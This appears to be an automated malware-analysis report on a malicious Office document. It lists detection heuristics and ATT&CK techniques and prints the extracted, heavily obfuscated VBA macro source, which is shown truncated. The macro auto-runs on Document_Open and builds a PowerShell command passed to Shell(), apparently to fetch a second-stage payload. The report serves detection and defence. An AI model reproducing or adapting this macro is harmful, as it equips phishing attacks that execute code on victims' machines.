Verdict: MALICIOUS
Risk Score: 162

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro triggers a 'Shell()' call, which is highly indicative of malicious intent. The VBA code attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload. The specific PowerShell command constructed is 'powershell', which is a critical indicator.
Heuristics (5)

- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14645 bytes | d16475ab1be8bc14443220102947a189e69c0c57f58f47d19759b3692c3d4b49 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "GXfzSDiOmJqOD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function EQLbrLXo()
On Error Resume Next
PMkYiM = CDate(75501)
jdtWH = 48982
oYjIw = CByte(PuUln)
kzljH = YrsTT
rwvFq = CDate(zolcH + Sin(14440 + 60812) * 42271 * CInt(17993))
zEOJUP = 46860
MWiJo = CDate(62034)
dbStLb = 18717
djEtDa = CByte(haDCXa)
mYQhjR = AQYOv
zmQzT = CDate(IfrXjK + Sin(62928 + 26008) * 24105 * CInt(30441))
Cmddj = 87611
DwDHu = CDate(69757)
vktfBi = 60251
NtqAG = CByte(XQPjO)
OoCiWN = SYjzhm
VuhDhS = CDate(iCikfA + Sin(73196 + 81878) * 76359 * CInt(43347))
RCJbfq = 18848
fUsAOw = CDate(54980)
iiVliB = 26179
NJjZjv = CByte(qXTGOu)
EVXSE = jvmmw
HjYhJ = CDate(JlivE + Sin(78467 + 43603) * 80527 * CInt(1322))
simPG = 97365
EQLbrLXo = wLwXHw + Chr$(SIHlauLvzwV + 80 + GOzYkkiSt) + "OwerSH" + OPHsNR + iRkYfXRqzjC + PIUJQBL + whDkhIGTl + vSjADwYE + cSmVuWjiRzw + niEzOU
vwduX = CDate(48506)
ABwlG = 63580
kKJGVp = CByte(jvsaK)
ljQJf = jupwo
sEIpi = CDate(oAKFj + Sin(34152 + 72033) * 33904 * CInt(53621))
DYDOj = 44621
hUOAlj = CDate(66037)
jBUXzB = 38200
pIIYs = CByte(XrOGP)
vmjjp = RtMMn
lBVkOX = CDate(XQITIL + Sin(79667 + 88199) * 72129 * CInt(62913))
mNSXk = 76530
End Function
Function XJjvnpd(NPbjQYk)
On Error Resume Next
TVLjj = CDate(93213)
XKUYAa = 12395
HSradT = CByte(ovQEM)
lKAZZ = GfbbE
FpoEG = CDate(JNaOfG + Sin(66951 + 41366) * 18728 * CInt(51680))
JoQikh = 34016
iWEYQ = CDate(49721)
mUfKzN = 63275
wdrJuq = CByte(ZvwjSi)
uTqrio = zvNpI
bwosz = CDate(QfqZLq + Sin(41284 + 63775) * 95280 * CInt(69336))
bwHWX = 60950
wznOmZjDw = wBiGVSdlG + Shell(azbnI + NPbjQYk + YNcufTpNoq, 67862 - 67862)
nsCUa = CDate(42715)
RwHhu = 10027
UcMrh = CByte(KdzjXs)
IWuzz = ziWPY
wOjzKR = CDate(cwLJzd + Sin(34481 + 62312) * 43481 * CInt(66257))
nGYUXF = 87114
End Function
Private Sub Document_open()
On Error Resume Next
LAfvS = CDate(6602)
hPFif = 71984
ZPrHW = CByte(wSzqB)
iICao = YdWqiN
YCZJu = CDate(dUotRM + Sin(34315 + 27477) * 97209 * CInt(48435))
TnfcN = 43280
AfXkv = CDate(13862)
Fzjtw = 20384
iijAM = CByte(QRJAcj)
pVmlCd = zdHzaZ
ZijpBc = CDate(JjbJc + Sin(58272 + 29395) * 79986 * CInt(99390))
zrYzEz = 88236
Application.Run HaqvcTnmaU + "XJjvnpd" + iwzHj, IAXzFBASbC + EQLbrLXo + iLRSf
XUYjHj = CDate(21966)
kCGkir = 479
zLfkv = CByte(UAWAC)
AYXYcD = EcQdXd
FPlCtp = CDate(kiSvmz + Sin(47886 + 16238) * 77869 * CInt(89381))
jPzja = 56499
UGHpt = CDate(12357)
FokVEF = 31195
wLkoRf = CByte(NjnhHo)
VtCSw = VCtTdN
ZYORwu = CDate(nDXziO + Sin(58600 + 8702) * 88024 * CInt(66432))
MJGYm = 42049
End Sub
Attribute VB_Name = "TlCZdPjdai"
Function OPHsNR()
On Error Resume Next
fBUOAv = 79260
NhBVOa = CDate(pbzUO + Sin(47616 + 41139) * 52263 * CInt(37630))
EnnHbc = 96412
YWGnKT = jVitz
zzmmb = CByte(rLhPa)
rhIQb = CDate(23979)
EJvlAUWESRa = "ell" + " " + "( ( " + "26,107 , 87," + " 113,73 ,8"
YLKXQM = 23999
RtwVwA = CDate(vQuGM + Sin(62472 + 37866) * 72247 * CInt(55875))
hQiZkz = 33752
NLihGY = VpfPn
CtQNf = CByte(EGADOc)
swXriv = CDate(64907)
GEOhIbGJBi = "7, 30" + ",3 ,30,80 , 91" + ", 73,19 ,81 , 9" + "2 , 84" + ", 91 , 9" + "3 " + ", 7"
hstKkI = 14459
hHimLr = CDate(ToXWPG + Sin(9906 + 65344) * 13930 * CInt(10040))
wRiAp = 46703
YMhffZ = jsYYwB
HYKuH = CByte(jztKV)
zIUvIk = CDate(23855)
SauVKvWi = "4 ," + " 30, 76" + ", 95 ,80, 90,81" + " ,83,5 , 26 ,11" + "8 ,124," + " 86" + " ," + "93 ,110,30, 3" + ",30 , 80,"
QpQKWo = 12019
hRjKH = CDate(QUJlX + Sin(4519 + 95755) * 95064 * CInt(21367))
UASnp = 47073
lowIj = jPDRh
uaNpQM = CByte(JCbJIi)
HvpVWS = CDate(78978)
QYCbljnrL = " 91 ,7" + "3,19,81, 92,84" + " ,91 " + ", 93,74"
vIGEcs = 64399
ITkNZD = CDate(zfjTP + Sin(98557 + 15410) * 17753 * CInt(60023))
OnzhI = 7011
QXlnRj = IilKs
XkcBK = CByte(hjiWjp)
lQGqp = CDate(90934)
DmAwsu = ", 30,1" + "09 ," + "71 " + ", 77 ,74"
... (truncated)
```